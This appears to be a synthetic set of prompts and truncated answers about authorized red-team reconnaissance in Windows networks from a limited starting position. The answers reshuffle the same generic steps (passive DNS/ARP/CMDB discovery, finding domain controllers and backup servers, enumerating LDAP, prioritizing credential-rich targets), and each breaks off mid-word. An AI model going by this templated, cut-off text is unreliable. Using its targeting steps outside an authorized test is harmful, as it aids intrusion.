Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu...
Read-only view into asset inventory/CMDB: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Ability to perform internal DNS queries: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP respons...
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Enumerate directory objects that are accessible and capture LDAP response...
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Network foothold with standard user rights
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc...
Read-only view into asset inventory/CMDB: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders.
Read-only view into asset inventory/CMDB
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis. Step 4: Prioritize targets that are likely to yield credentials or privilege...
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation.
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Prioritize targets that are likely to yield credentials or privileged access. Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-...
Ability to perform internal DNS queries: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test?
Ability to perform internal DNS queries
Step 1: Confirm authorization and scope before proceeding. Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment. Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups. Step 4: Enumerate directory objects that are accessible and capture LDAP response...